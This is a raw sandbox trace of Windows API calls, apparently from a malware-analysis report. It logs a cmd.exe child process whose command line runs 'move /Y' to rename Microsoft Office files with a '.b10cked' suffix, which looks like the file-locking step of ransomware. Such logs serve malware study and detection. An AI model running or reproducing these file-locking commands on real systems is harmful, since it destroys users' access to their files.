[0153.526] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0153.527] _wcsicmp (_String1="move", _String2=")") returned 68 [0153.527] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0153.527] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0153.527] _wcsicmp (_String1="IF", _String2="move") returned -4 [0153.527] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0153.527] _wcsicmp (_String1="REM", _String2="move") returned 5 [0153.527] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0153.532] GetConsoleTitleW (in: lpConsoleTitle=0x2ef588, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.589] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0153.589] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0153.589] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0153.589] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0153.589] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0153.589] _wcsicmp (_String1="move", _String2="CD") returned 10 [0153.589] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0153.589] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0153.589] _wcsicmp (_String1="move", _String2="REN") returned -5 [0153.589] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0153.589] _wcsicmp (_String1="move", _String2="SET") returned -6 [0153.589] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0153.589] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0153.589] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0153.589] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0153.589] _wcsicmp (_String1="move", _String2="MD") returned 11 [0153.589] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0153.589] _wcsicmp (_String1="move", _String2="RD") returned -5 [0153.589] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0153.589] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0153.589] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0153.589] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0153.589] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0153.589] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0153.589] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0153.589] _wcsicmp (_String1="move", _String2="VER") returned -9 [0153.590] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0153.590] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0153.590] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0153.590] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0153.590] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0153.590] _wcsicmp (_String1="move", _String2="START") returned -6 [0153.590] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0153.590] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0153.590] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0153.591] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.591] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.591] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef344, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef33c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef33c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0153.593] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0153.593] _wcsicmp (_String1="MOR6IN~1.TRX", _String2=".") returned 63 [0153.593] _wcsicmp 
(_String1="MOR6IN~1.TRX", _String2="..") returned 63 [0153.593] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mor6in~1.trx")) returned 0x2020 [0153.594] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x61f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.594] SetErrorMode (uMode=0x0) returned 0x0 [0153.594] SetErrorMode (uMode=0x1) returned 0x0 [0153.594] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX", nBufferLength=0x104, lpBuffer=0x2eeccc, lpFilePart=0x2eecb4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX", lpFilePart=0x2eecb4*="MOR6IN~1.TRX") returned 0x3c [0153.594] SetErrorMode (uMode=0x0) returned 0x1 [0153.594] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0153.594] _wcsicmp (_String1="MOR6IN~1.TRX", _String2=".") returned 63 [0153.594] _wcsicmp (_String1="MOR6IN~1.TRX", _String2="..") returned 63 [0153.594] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mor6in~1.trx")) returned 0x2020 [0153.594] SetErrorMode (uMode=0x0) returned 0x0 [0153.594] SetErrorMode (uMode=0x1) returned 0x0 [0153.595] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX", nBufferLength=0x104, lpBuffer=0x2ef148, lpFilePart=0x2eeee0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX", lpFilePart=0x2eeee0*="MOR6IN~1.TRX") returned 0x3c [0153.595] SetErrorMode (uMode=0x0) returned 0x1 [0153.595] SetErrorMode (uMode=0x0) returned 0x0 [0153.595] SetErrorMode (uMode=0x1) returned 0x0 [0153.595] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2ef350, lpFilePart=0x2eeee0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked", lpFilePart=0x2eeee0*="MOR6INT.REST.trx_dll.b10cked") returned 0x4c [0153.595] SetErrorMode (uMode=0x0) returned 0x1 [0153.595] SetLastError (dwErrCode=0x0) [0153.595] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mor6int.rest.trx_dll.b10cked")) returned 0xffffffff [0153.595] GetLastError () returned 0x2 [0153.595] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2ee85c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee85c) returned 0x62130 [0153.595] FindNextFileW (in: hFindFile=0x62130, lpFindFileData=0x2ee85c | out: lpFindFileData=0x2ee85c) returned 0 [0153.596] GetLastError () returned 0x12 [0153.596] FindClose (in: hFindFile=0x62130 | out: hFindFile=0x62130) returned 1 [0153.597] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x61cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x61cc0) returned 0x62130 [0153.597] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2eeaf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0153.597] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x2eeaf4, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll", lpFilePart=0x0) returned 0x44 [0153.597] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mor6int.rest.trx_dll")) returned 0x2020 [0153.597] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mor6int.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mor6int.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0153.598] FindClose (in: hFindFile=0x62130 | out: hFindFile=0x62130) returned 1 [0153.598] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eeaa8 | out: _Buffer=" 1") returned 9 [0153.598] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.598] GetFileType (hFile=0x7) returned 0x2 [0153.598] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0153.598] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eea34 | out: lpMode=0x2eea34) returned 1 [0153.598] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.598] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eea68 | out: lpConsoleScreenBufferInfo=0x2eea68) returned 1 [0153.599] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0153.599] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eeaa8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0153.599] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x2eea8c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eea8c*=0x1a) returned 1 [0153.599] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.599] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.599] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.599] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.600] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.600] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.600] SetConsoleInputExeNameW () returned 0x1 [0153.600] GetConsoleOutputCP () returned 0x1b5 [0153.600] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.600] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.600] exit (_Code=0) Process: id = "255" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xe48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20757 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20758 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20759 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20760 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 20761 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20762 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20763 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20764 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20765 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 20766 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20923 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20924 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20925 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20926 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 20927 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 20928 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20929 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20930 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20931 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20932 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20933 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20934 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20935 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20936 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20937 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 20938 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20939 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 20940 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 20941 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 20942 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 20943 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 20944 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 20945 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 20946 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001160000" filename = "" Thread: id = 318 os_tid = 0xfe0 [0153.708] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f934 | out: lpSystemTimeAsFileTime=0x18f934*(dwLowDateTime=0x958d0220, dwHighDateTime=0x1d440a9)) [0153.708] GetCurrentProcessId () returned 0xe48 [0153.708] GetCurrentThreadId () returned 0xfe0 [0153.708] GetTickCount () returned 0x2f556 [0153.708] QueryPerformanceCounter (in: lpPerformanceCount=0x18f92c | out: lpPerformanceCount=0x18f92c*=21049729698) returned 1 [0153.709] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0153.709] __set_app_type (_Type=0x1) [0153.709] __p__fmode () returned 0x76b331f4 [0153.709] __p__commode () returned 0x76b331fc [0153.709] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0153.709] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0153.709] GetCurrentThreadId () returned 0xfe0 [0153.709] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfe0) returned 0x38 [0153.709] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.709] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0153.709] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.709] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0153.709] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f8c4 | out: phkResult=0x18f8c4*=0x0) returned 0x2 [0153.710] VirtualQuery (in: lpAddress=0x18f8fb, lpBuffer=0x18f894, dwLength=0x1c | out: lpBuffer=0x18f894*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.710] VirtualQuery (in: 
lpAddress=0x90000, lpBuffer=0x18f894, dwLength=0x1c | out: lpBuffer=0x18f894*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0153.710] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f894, dwLength=0x1c | out: lpBuffer=0x18f894*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0153.710] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f894, dwLength=0x1c | out: lpBuffer=0x18f894*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.710] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f894, dwLength=0x1c | out: lpBuffer=0x18f894*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0153.710] GetConsoleOutputCP () returned 0x1b5 [0153.710] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.710] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0153.710] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.710] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0153.710] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.710] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.710] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.710] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.710] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.710] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.711] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.711] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0153.711] GetEnvironmentStringsW () returned 0x280210* [0153.711] FreeEnvironmentStringsW 
(penv=0x280210) returned 1 [0153.711] GetEnvironmentStringsW () returned 0x280210* [0153.711] FreeEnvironmentStringsW (penv=0x280210) returned 1 [0153.711] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e834 | out: phkResult=0x18e834*=0x40) returned 0x0 [0153.711] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x0, lpData=0x18e840*=0xa0, lpcbData=0x18e838*=0x1000) returned 0x2 [0153.711] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x4, lpData=0x18e840*=0x1, lpcbData=0x18e838*=0x4) returned 0x0 [0153.711] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x0, lpData=0x18e840*=0x1, lpcbData=0x18e838*=0x1000) returned 0x2 [0153.711] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x4, lpData=0x18e840*=0x0, lpcbData=0x18e838*=0x4) returned 0x0 [0153.711] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x4, lpData=0x18e840*=0x40, lpcbData=0x18e838*=0x4) returned 0x0 [0153.711] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x4, lpData=0x18e840*=0x40, 